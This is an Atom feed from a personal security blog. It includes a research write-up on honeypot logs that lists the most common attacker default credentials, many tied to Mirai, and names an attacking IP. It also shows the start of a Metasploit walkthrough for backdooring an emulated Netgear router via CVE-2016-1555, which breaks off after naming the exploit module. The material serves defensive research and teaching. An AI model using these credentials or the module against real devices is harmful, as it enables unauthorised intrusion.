<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
    <title>maxine.dev</title>
    <subtitle>Security and caffeine</subtitle>
    <link rel="self" type="application/atom+xml" href="https://maxine.dev/atom.xml"/>
    <link rel="alternate" type="text/html" href="https://maxine.dev/"/>
    <generator uri="https://www.getzola.org/">Zola</generator>
    <updated>2026-09-09T00:00:00+00:00</updated>
    <id>https://maxine.dev/atom.xml</id>
    <entry xml:lang="en">
        <title>Projects</title>
        <published>2026-09-09T00:00:00+00:00</published>
        <updated>2026-09-09T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/projects/"/>
        <id>https://maxine.dev/projects/</id>
        
        <content type="html" xml:base="https://maxine.dev/projects/">&lt;h2 id=&quot;yff&quot;&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;yff.skrog.dev&#x2F;&quot;&gt;Yff&lt;&#x2F;a&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;I am learning Norwegian sign language. I wanted to keep a record of the signs that I learned, that was not present in &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.minetegn.no&#x2F;Tegnbanken-2016&#x2F;index.php#banken&quot;&gt;Tegnbanken&lt;&#x2F;a&gt;. Hence, I started tinkering with this concept.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;yff.skrog.dev&#x2F;&quot;&gt;Yff-app&lt;&#x2F;a&gt; mirrors Tegnbanken, aka. MineTegn, and gives me the possibilitty to record my own signs, organise them, and jot down notes. No data leaves the device and it functions offline. Backups may be exported and imported.&lt;&#x2F;p&gt;
&lt;p&gt;The PWA written in Svelte and Typescript is intended primarily for my personal use, but since others have also found it useful, I am leaving it publicly accesible. I am in no way endorsing widespread use of it. I am simply tired of Statped being underfunded.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;skrog&quot;&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;skrog.dev&quot;&gt;Skrog&lt;&#x2F;a&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;Behind the flickering logo on the webpage, is a well-oiled machinery configured in &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;komo.do&#x2F;&quot;&gt;Komo.do&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Before Komodo, I used Vercel. My infrastructure move to Norwegian soil, in its entirety (that includes domain name providers), was finalised in early October 2026. Since then, it has been chugging along and kept my cloud services stable, amongst them my personal library.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>AWSY#1</title>
        <published>2026-08-13T00:00:00+00:00</published>
        <updated>2026-08-13T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/awsy-1/"/>
        <id>https://maxine.dev/post/awsy-1/</id>
        
        <summary type="html">&lt;p&gt;Welcome to the VERY FIRST &quot;Are we secure yet&quot;! AWSY for short! The segment where the answer is always no! Move over Google dorks, and make space for... good &#x27;ol regex???&lt;&#x2F;p&gt;</summary>
        
    </entry>
    <entry xml:lang="en">
        <title>About</title>
        <published>2026-08-05T00:00:00+00:00</published>
        <updated>2026-08-05T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/about/"/>
        <id>https://maxine.dev/about/</id>
        
        <content type="html" xml:base="https://maxine.dev/about/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;moi.jpg&quot; alt=&quot;Maxine - profile picture&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Hi. I&#x27;m Maxine.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Pronouns are she&#x2F;her&lt;&#x2F;li&gt;
&lt;li&gt;Lesbian and intersectional feminist&lt;&#x2F;li&gt;
&lt;li&gt;BSc Digital Forensics @ Noroff&lt;&#x2F;li&gt;
&lt;li&gt;Sr. security R&amp;amp;D engineer @ SoftwareOne&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h2 id=&quot;currently-reading&quot;&gt;Currently reading&lt;&#x2F;h2&gt;
&lt;ul&gt;
&lt;li&gt;The Tower of the Swallow by Andrzej Sapkowski&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>I added some spite to my website</title>
        <published>2026-02-23T00:00:00+00:00</published>
        <updated>2026-02-23T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/poisoning-the-well/"/>
        <id>https://maxine.dev/post/poisoning-the-well/</id>
        
        <summary type="html">&lt;p&gt;I&#x27;m not gonna pretend my little blog is some treasure trove of groundbreaking insights. But it&#x27;s &lt;em&gt;mine&lt;&#x2F;em&gt;. I wrote it. And the idea that some AI techbro can just hoover up everything I&#x27;ve ever typed into a markdown file, feed it into their training pipeline, and never even send me a courtesy email? That rubs me the wrong way.&lt;&#x2F;p&gt;
&lt;p&gt;So I did something about it. Several somethings, actually. None of them are perfect, and some are probably pointless. Spite is a valid engineering motivation, imo.&lt;&#x2F;p&gt;</summary>
        
    </entry>
    <entry xml:lang="en">
        <title>SSG Wars: A New Look</title>
        <published>2026-01-15T00:00:00+00:00</published>
        <updated>2026-01-15T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/ssg-wars-a-new-look/"/>
        <id>https://maxine.dev/post/ssg-wars-a-new-look/</id>
        
        <summary type="html">&lt;p&gt;I&#x27;ve migrated the entire site from Hugo to Zola, along with a complete visual overhaul using a new theme. I thought I&#x27;d document what I learned along the way.&lt;&#x2F;p&gt;</summary>
        
    </entry>
    <entry xml:lang="en">
        <title>Third attempt at developing 35mm film at home</title>
        <published>2023-06-13T00:00:00+00:00</published>
        <updated>2023-06-13T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/third-attempt-at-developing-35mm-film-at-home/"/>
        <id>https://maxine.dev/post/third-attempt-at-developing-35mm-film-at-home/</id>
        
        <summary type="html">&lt;p&gt;I have now (finally) developed my third roll of film at home. For some reason they were quite grainy this time, but I am at least happy with how they turned out.&lt;&#x2F;p&gt;</summary>
        
    </entry>
    <entry xml:lang="en">
        <title>Second attempt at developing 35mm film at home</title>
        <published>2021-09-25T00:00:00+00:00</published>
        <updated>2021-09-25T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/second-attempt-at-developing-35mm-film-at-home/"/>
        <id>https://maxine.dev/post/second-attempt-at-developing-35mm-film-at-home/</id>
        
        <summary type="html">&lt;p&gt;The second roll of film is now online!&lt;&#x2F;p&gt;</summary>
        
    </entry>
    <entry xml:lang="en">
        <title>Reviving an OKI Microline 320 Elite dot matrix printer (Part I)</title>
        <published>2021-09-12T00:00:00+00:00</published>
        <updated>2021-09-12T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/reviving-an-oki-microline-320-elite-dot-matrix-printer-part-i/"/>
        <id>https://maxine.dev/post/reviving-an-oki-microline-320-elite-dot-matrix-printer-part-i/</id>
        
        <summary type="html">&lt;p&gt;I have an unhealthy obsession with printing, typewriters and printers. The best cure for this horrible affliction is, of course, to stimulate it by bringing an ancient, but hardly forgotten, relic of our digital times back to life: the &lt;em&gt;OKI Microline 320 Elite&lt;&#x2F;em&gt;; for short &lt;em&gt;ML320EL&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;</summary>
        
    </entry>
    <entry xml:lang="en">
        <title>First attempt at developing 35mm film at home</title>
        <published>2021-07-15T00:00:00+00:00</published>
        <updated>2021-07-15T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/first-attempt-at-developing-35mm-film-at-home/"/>
        <id>https://maxine.dev/post/first-attempt-at-developing-35mm-film-at-home/</id>
        
        <summary type="html">&lt;p&gt;Five days ago I developed my first roll of film at home with mixed results, but I&#x27;m quite happy with them.&lt;&#x2F;p&gt;</summary>
        
    </entry>
    <entry xml:lang="en">
        <title>Towards using NoSQL for honeypots</title>
        <published>2019-10-28T00:00:00+00:00</published>
        <updated>2019-10-28T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/honeypot-nosql/"/>
        <id>https://maxine.dev/post/honeypot-nosql/</id>
        
        <content type="html" xml:base="https://maxine.dev/post/honeypot-nosql/">&lt;h2 id=&quot;abstract&quot;&gt;Abstract&lt;&#x2F;h2&gt;
&lt;p&gt;While one might argue that the development and interest in honeypots have decreased, there seems to be novel interest in getting these systems to work at scale and in more automated manners. This study attempts to deliver a higher-level overview of the data generated of a period of time by a medium interaction honeypot running cowrie, a free and open-source honeypot that is currently very popular as well as regularly updated. The research is based on a dataset consisting of approximately 7.7 million events spanning almost four months. Some rudimentary tools were developed to transform the log files from a text-based origin to a MongoDB database, and to facilitate a performant and simple communication to the log files located on said database. Both quantitative and qualitative measurements were considered for this task. The research concludes with some suggestions relating to how this project can be taken further and how the data analysed from this project can give indications as to what areas should be further researched in separate studies.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;With a steady pace to move older infrastructure to the web comes a different set of problems that have to be considered. Documents that used to be locked into a cabinet where only a few managers had the key can now potentially be accessed if someone is using default credentials to &quot;secure&quot; the system. To assess the threat image honeypots may be used to, in various degrees of interaction, probe the internet for this information. This way, one may understand more of what one is up against and possibly even stop attacks before they do much harm, by the help of precursor attack analysis (Ahmad, 2015). The problem with this is that the amount of data generated by such systems can be overwhelming. Hence, we need novel systems better suited for the analysis of data at this scale. In this study, an attempt will be made to demonstrate the importance of efficient data handling through database systems, in the case of this task: MongoDB.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;data-overview&quot;&gt;Data overview&lt;&#x2F;h2&gt;
&lt;p&gt;Prior to any analysis done of the data, a lot of effort was put into planning the most efficient way the data could be queried and manipulated. Some of the technologies that were considered instead of MongoDB were SQLite and PostgreSQL. While these technologies could be used, as the data is relatively structured, the speed and ease that documents (a term used for fields or entities in MongoDB) can be either inserted or retrieved. ACID compliance was not of high importance either (Hammes, 2014). The full dataset was 8.1GB (7.7 million documents), with a date range from 30-03-2019 to 21-07-2019. What should be noted is that the data from the honeypot is not entirely continuous, meaning that some days between the start and end of the honeypot recording are missing. Such is mostly seen in 07-2019. After this, the range of the dataset could be determined, as the size of it was dependant on how performant the chosen technology was. Due to the success of the initial research in performant queries, the entirety of the cowrie dataset was possible to be analysed. Due to the size of the dataset, compromises had to be made as it was clear that some analysis that was planned would not be feasible. An analysis of all reported binaries would be beneficial, but it was deemed unfeasible due to the size of the dataset and the many limiting factors (such as low requests per second) of potential APIs (like VirusTotal). As most of the documents already contained geolocalisation data, the effort was put to structuring this data and presenting a higher-level perspective. Despite that, some tasks used a GeoLite2 database (MaxMind, 2019) to get geolocalisation data for some of the analysis.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;analysis&quot;&gt;Analysis&lt;&#x2F;h2&gt;
&lt;p&gt;A graph was plotted showing attack attempts against units of time showing attempted attacks against the honeypot. This graph gives a clear insight into where the attacks accumulate depending on the time of the attack.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;attack_attempts.png&quot; alt=&quot;Graph showing attack attempts (SSH and Telnet) per unit of time.&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Therefore, it is evident that attacks usually happen in bursts, which is as expected as the majority of attempts (especially automated ones) will most likely occur in one continuous action.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;credentials&quot;&gt;Credentials&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;usernames&quot;&gt;Usernames&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Username&lt;&#x2F;strong&gt; &lt;strong&gt;No. of occurences&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;root 236070&lt;&#x2F;li&gt;
&lt;li&gt;admin 15654&lt;&#x2F;li&gt;
&lt;li&gt;enable\x00 9403&lt;&#x2F;li&gt;
&lt;li&gt;shell\x00 9331&lt;&#x2F;li&gt;
&lt;li&gt;(empty string) 3937&lt;&#x2F;li&gt;
&lt;li&gt;default 2804&lt;&#x2F;li&gt;
&lt;li&gt;support 1800&lt;&#x2F;li&gt;
&lt;li&gt;user 1344&lt;&#x2F;li&gt;
&lt;li&gt;guest 1064&lt;&#x2F;li&gt;
&lt;li&gt;pi 852&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;passwords&quot;&gt;Passwords&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Password&lt;&#x2F;strong&gt; &lt;strong&gt;No. of occurences&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;admin 163971&lt;&#x2F;li&gt;
&lt;li&gt;system\x00 9451&lt;&#x2F;li&gt;
&lt;li&gt;sh\x00 9091&lt;&#x2F;li&gt;
&lt;li&gt;7ujMko0admin 7830&lt;&#x2F;li&gt;
&lt;li&gt;xc3511 6556&lt;&#x2F;li&gt;
&lt;li&gt;default 6391&lt;&#x2F;li&gt;
&lt;li&gt;12345 6251&lt;&#x2F;li&gt;
&lt;li&gt;vizxv 5553&lt;&#x2F;li&gt;
&lt;li&gt;password 5294&lt;&#x2F;li&gt;
&lt;li&gt;root 4745&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;username-and-password&quot;&gt;Username and password&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;username:password&lt;&#x2F;strong&gt; &lt;strong&gt;No. of occurences&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;root:admin 161519&lt;&#x2F;li&gt;
&lt;li&gt;enable\x00:system\x00 9359&lt;&#x2F;li&gt;
&lt;li&gt;shell\x00:sh\x00 9091&lt;&#x2F;li&gt;
&lt;li&gt;root:7ujMko0admin 7166&lt;&#x2F;li&gt;
&lt;li&gt;root:xc3511 6490&lt;&#x2F;li&gt;
&lt;li&gt;root:vizxv 5488&lt;&#x2F;li&gt;
&lt;li&gt;root:default 5407&lt;&#x2F;li&gt;
&lt;li&gt;root:12345 4874&lt;&#x2F;li&gt;
&lt;li&gt;root:password 4067&lt;&#x2F;li&gt;
&lt;li&gt;root:hunt5759 3958&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;logins&quot;&gt;Logins&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;successful_logins_src_ip.png&quot; alt=&quot;Graph showing successful logins against the IP of the attacker.&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;ports&quot;&gt;Ports&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;ports_full_set.png&quot; alt=&quot;Graph showing amount of ports hitting the honeypot.&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;geolocation&quot;&gt;Geolocation&lt;&#x2F;h3&gt;
&lt;p&gt;While, as stated earlier, most documents contained geolocalisation data, some analysis was done using the GeoLite2 database (MaxMind, 2019) through a script written by Raidan Campbell (Campbell, 2019), but modified to work with MongoDB instead of CSV files.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;countries.png&quot; alt=&quot;Graph showing number of attack attempts relative to country.&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Graph showing number of attack attempts relative to country.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;bad_ip_countries.png&quot; alt=&quot;Graph showing where bad IPs come from.&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Graph showing where bad IPs come from.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;h1 id=&quot;results&quot;&gt;Results&lt;&#x2F;h1&gt;
&lt;h2 id=&quot;credentials-1&quot;&gt;Credentials&lt;&#x2F;h2&gt;
&lt;p&gt;Default usernames and passwords is an old problem (Howard, 2005), which one might think would be gone by now. Alas, this is not the case (Ling, 2017) and the rampant use of them in the internet of things (IoT) devices is only part of an old habit that needs to cease to exist for security&#x27;s sake. While many usernames and passwords seem trivial to guess, such as &quot;root&quot;, &quot;pi&quot; and &quot;admin&quot;, some are a bit less trivial as to why they are popular, like &quot;xc3511&quot;. Many of these credentials even repeat themselves in other scientific journals (Hendriks, 2017). A recurring theme seems to deal with default credentials for the Mirai botnet (Van der Elzen, 2017). This should come as no surprise as default passwords in IoT devices have been exploited heavily in the recent times as its use is infamously widespread (Antonakakis, 2017), with Mirai being just one of the entities uses this &quot;exploit&quot;. With all this considered, it is no wonder that the usage of default credentials is still a matter of research and debate (Knieriem, 2017). Interesting to note is that several of both usernames and passwords contained null-characters (\x00), while there a range of different answers to be found why this is so, one phenomenon described by Anthony Ferrara where combining BCrypt with other cryptographic functions can yield an application insecure to null-character based attacks.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;logins-1&quot;&gt;Logins&lt;&#x2F;h2&gt;
&lt;p&gt;According to the figure, one may see that many of the attacks are done from a small subset of the IP addresses, with one IP address (198.98.62.237) dominating in the number of attempted attacks. Compared to the total number of connections from this IP address, being 2546654, one can that the amount of successful logins dwarfs in comparison at 32718, which amounts to approximately 1.28% of the observed data.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;ports-1&quot;&gt;Ports&lt;&#x2F;h2&gt;
&lt;p&gt;With the number of attacks against the cowrie honeypot, namely the SSH and telnet services being emulated, one might think that the ports these services would be attacked at would be strongly represented; even in the first place. However, port 443 (HTTPS) and port 25 (SMTP) is the first and second most hit ports, respectively, as can be seen in the figure. Even more interesting is that most of the connections attempting to connect to the SMTP service are coming from a similar range of IP addresses (5.188.86.0&#x2F;24 or 5.188.87.0&#x2F;24) with very few other connections being made. Port 22 (SSH) is, in fact, the third most hit port, which one may reason that this is because these attacks are mostly (if not almost exclusively) automated with very little human interaction needed.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;binaries&quot;&gt;Binaries&lt;&#x2F;h2&gt;
&lt;p&gt;Some URLs, which contains binaries, were defined as malware by VirusTotal in four out of 68 cases (VirusTotal, 2019a) for the one, and three out of 67 cases for another (VirusTotal, 2019b). There are other instances of either URLs or IP addresses which VirusTotal defines as malicious (VirusTotal, 2019c). While an analysis of all reported binaries would be beneficial, it was deemed unfeasible due to the size of the dataset and the many limiting factors (such as low requests per second) of potential APIs (like VirusTotal).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;geolocation-1&quot;&gt;Geolocation&lt;&#x2F;h2&gt;
&lt;p&gt;The US, Ireland, Singapore and Russia is seen to lead in the number of attacks that can be attributed to these countries compared to all other countries
relative to connections. The distribution is, however, slightly different when it comes to sources that are deemed malicious by AlienVault from threatfeeds.io (Threatfeeds, 2019), as displayed on the figure. From the analysis of potential attackers, the US is still the largest. However, the countries after this are very different comparing to the total amounts of connections, namely China, South Korea, Taiwan and Japan. While these are indeed four separate countries, it is interesting that these connections are from different locations in so close geographical proximation to each other.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;threat-intelligence&quot;&gt;Threat intelligence&lt;&#x2F;h2&gt;
&lt;p&gt;One of the larger, and frequently updated, datasets available from threatfeed.io is the &quot;Alienvault IP Reputation&quot; dataset which contains over 200000 IP addresses with a quantitative measurement of how suspicious it is deemed. Using this data, a script was written to determine which country had a higher output of the malicious activity. In the figure, it can be seen that some countries dominate the statistics, and those countries are not necessarily related to how the general activity coming from said countries.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;It can be seen that a database can aid in the analysis of larger datasets. The performance enhancements are especially helpful when wanting a higher-level overview of the data without resorting to splitting one&#x27;s data into several files, as more traditional methods using, for example, plain CSV files would dictate. From the data analysis, one can also see that the dangers of using default credentials are still a problem that is still serious, especially as IoT devices are often vulnerable to such attacks, according to research. Some of the analysis may also indicate that these attacks are highly automated and often associated with known malware such as Mirai.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;future-work&quot;&gt;Future work&lt;&#x2F;h2&gt;
&lt;p&gt;Primarily, improvements upon already presented methods that would yield a lower-level and more complete analysis of the data would be beneficial. To achieve this, however, processing speeds would have to be improved dramatically in addition to even more performant hardware. Such performance enhancements would need to scale so that it could also cope with an even larger dataset. Multithreading and&#x2F;or multiprocessing would be obvious candidates to achieve this task.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;references&quot;&gt;References&lt;&#x2F;h2&gt;
&lt;p&gt;Ahmad, A., Maynard, S. B., &amp;amp; Shanks, G. (2015). A case analysis of information systems and security incident responses. &lt;em&gt;International Journal of Information Management&lt;&#x2F;em&gt; , &lt;em&gt;35&lt;&#x2F;em&gt; (6), 717– 723.&lt;&#x2F;p&gt;
&lt;p&gt;Antonakakis, M., April, T., Bailey, M., Bernhard, M., Bursztein, E., Cochran, J,... Kallitsis, M., et al. (2017). Understanding the mirai botnet. In &lt;em&gt;26th usenix security symposium (usenix security 17)&lt;&#x2F;em&gt; (pp. 1093–1110).&lt;&#x2F;p&gt;
&lt;p&gt;Campbell, R. (2017). Retrieved from https:&#x2F;&#x2F;github.com&#x2F;raidancampbell&#x2F;Cowrie-Analyzer&lt;&#x2F;p&gt;
&lt;p&gt;Hammes, D., Medero, H., &amp;amp; Mitchell, H. (2014). Comparison of nosql and sql databases in the cloud. &lt;em&gt;Proceedings of the Southern Association for Information Systems (SAIS), Macon, GA&lt;&#x2F;em&gt; , 21–22.&lt;&#x2F;p&gt;
&lt;p&gt;Hendriks, C. (2017). Fixing the average internet user&#x27;s iot vulnerabilities. Howard, M., LeBlanc, D., &amp;amp; Viega, J. (2005). 19 deadly sins of software security. &lt;em&gt;Programming Flaws and How to Fix Them&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Knieriem, B., Zhang, X., Levine, P., Breitinger, F., &amp;amp; Baggili, I. (2017). An overview of the usage of default passwords. In &lt;em&gt;International conference on digital forensics and cyber crime&lt;&#x2F;em&gt; (pp. 195–203). Springer.&lt;&#x2F;p&gt;
&lt;p&gt;Ling, Z., Luo, J., Xu, Y., Gao, C., Wu, K., &amp;amp; Fu, X. (2017). Security vulnerabilities of internet of things: A case study of the smart plug system. &lt;em&gt;IEEE Internet of Things Journal&lt;&#x2F;em&gt; , &lt;em&gt;4&lt;&#x2F;em&gt; (6), 1899–1909.&lt;&#x2F;p&gt;
&lt;p&gt;MaxMind. (2019). Geolite2 free downloadable databases. Retrieved from https:&#x2F;&#x2F;dev.maxmind.com&#x2F;geoip&#x2F;geoip2&#x2F;geolite2&#x2F;&lt;&#x2F;p&gt;
&lt;p&gt;Threatfeeds. (2019). Free threat intelligence feeds - threatfeeds.io. Retrieved from https:&#x2F;&#x2F;threatfeeds.io&#x2F;&lt;&#x2F;p&gt;
&lt;p&gt;Van der Elzen, I., &amp;amp; van Heugten, J. (2017). Techniques for detecting compromised iot devices. &lt;em&gt;University of Amsterdam&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;VirusTotal. (2019a). Virustotal. Retrieved from &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.virustotal.com&#x2F;gui&#x2F;url&#x2F;480b4fb7d537f76fd51b694a0f42239bbb64509d8464634cb4c639d93e5a36d6&#x2F;detection&quot;&gt;LINK&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;VirusTotal. (2019b). Virustotal. Retrieved from &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.virustotal.com&#x2F;gui&#x2F;url&#x2F;81247b789c2bb718cc7c43b651de2016bd130d33556c79ec44036b3667541a1c&#x2F;detection&quot;&gt;LINK&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;VirusTotal. (2019c). Virustotal. Retrieved from &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.virustotal.com&#x2F;gui&#x2F;url&#x2F;3d854adc5481527edb29bde25da0c99f5381200605c51d06271fe86d66f123df&#x2F;detection&quot;&gt;LINK&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Router exploitation with Metasploit</title>
        <published>2019-06-07T00:00:00+00:00</published>
        <updated>2019-06-07T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/router-exploitation-metasploit/"/>
        <id>https://maxine.dev/post/router-exploitation-metasploit/</id>
        
        <content type="html" xml:base="https://maxine.dev/post/router-exploitation-metasploit/">&lt;p&gt;This is a demonstration showing the feasibility of router exploitation through the use of the exploitation framework Metasploit while only having the firmware emulated, id est without running it on actual hardware. The steps, including code and commands in order to reproduce the exploitation, will be presented and discussed. The act of exploiting routers through the use of cross-site scripting XSS will also be briefly discussed, along with the impact that a seemingly trivial vulnerability can have upon a router in a Small Office Home Office (SOHO) environment. Then, in part two of this report, A case for open-source alternative solutions to current proprietary tools will also be made and its relation to the &quot;Right to repair&quot; movement and the implications that might have upon both the forensic situation and automotive security field as a whole.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;router-exploitation&quot;&gt;Router exploitation&lt;&#x2F;h2&gt;
&lt;p&gt;Small Office Home Office (SOHO) routers may be regarded as the one entryway into either a home or small office. Because of this, the security of this class of routers is essential.&lt;&#x2F;p&gt;
&lt;p&gt;While most routers are not necessarily connected to the internet in such a way that remote users may access them across the web, there is still the possibility that a user may have (mis)configured their router to make such possible. A more pressing security issue, however, is that remote users in close proximity to a vulnerable router may still exploit it.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;leverage-and-entrance-vectors&quot;&gt;Leverage and entrance vectors&lt;&#x2F;h3&gt;
&lt;p&gt;Before a router can be exploited, the backdoor or exploit will have to be leveraged to the system. There are several routes that may be attempted depending on factors such as physical availability of a network for an attacker, feasibility&lt;&#x2F;p&gt;
&lt;p&gt;A very predictable way that an unauthenticated user may gain access to a router is through default credentials. While this is luckily getting more uncommon in recent times, default passwords should always be changed. It is a simple measure with great implications for security. Default credentials can be present on various part of a SOHO networking system, but the most likely places where such can be used as an attack vector are devices that give an attacker a convenient way in. In a SOHO network, such devices would most commonly be wireless routers for the first barrier of entry. These can house two potential places where default passwords are present: access to the wireless network itself and access to the router&#x27;s administration interface. Any one of these things may severely increase the likelihood that a router may be compromised, and thus, the CIA principle is therefore broken as any data flowing through that device cannot be trusted in terms of either confidentiality, integrity or availability. However, as will be demonstrated, this is not the only vector that a malicious actor may take to compromise a router.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;backdooring&quot;&gt;Backdooring&lt;&#x2F;h3&gt;
&lt;p&gt;To prove the feasibility of backdooring a router, the firmware &quot;WNAP320 Firmware Version 2.0.3&quot; will be used (Netgear, 2020), which is utilised by the WNAP320 router by Netgear. The firmware was emulated through Firmware Analysis Toolkit (FAT) which created a virtual network that one may connect to. After the firmware was shown to be correctly emulating through a Nmap scan, exploitation could begin.&lt;&#x2F;p&gt;
&lt;p&gt;To backdoor this specific firmware, the first thing one may do is to look for a related &quot;common vulnerabilities and exposures (CVEs) (Common Vulnerabilities, 2020) that can show the current possibilities for the exploitation of said firmware. For this exact firmware version, there are three vulnerabilities, each with their CVE identification number. However, there are only one with an available exploit to run through Metasploit, hence this is the CVE in question that will be used for demonstration purposes.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;cve-2016-1555&quot;&gt;CVE-2016-1555&lt;&#x2F;h4&gt;
&lt;p&gt;CVE-2016-1555 (Details, 2016), discovered by Dominic Chen (Chen, 2016), creator of FIRMADYNE, describes this vulnerability as a being a 10.0 on the CVSS score (Common Vulnerability Scoring System) which categorises it as an extremely serious vulnerability. Confidentiality impact, integrity impact, availability impact are regarded as &quot;complete&quot;, meaning it fully violates the CIA principle. It also is regarded as being easy to exploit, hence its categorisation of access complexity as low, with a complete lack of authentication in order to exploit the vulnerability.&lt;&#x2F;p&gt;
&lt;p&gt;The exploit is prepared to be used in the exploit framework &quot;Metasploit&quot; which makes it easy both to demonstrate what is being done in this exploit, as well as doing so successfully. In Metasploit, the aforementioned CVE is called &quot;exploit&#x2F;linux&#x2F;http&#x2F;netgear_unauth_exec&quot;.&lt;&#x2F;p&gt;
&lt;p&gt;The following steps may be taken to backdoor the server.&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Start msfconsole&lt;&#x2F;li&gt;
&lt;li&gt;use exploit&#x2F;linux&#x2F;http&#x2F;netgear_unauth_exec&lt;&#x2F;li&gt;
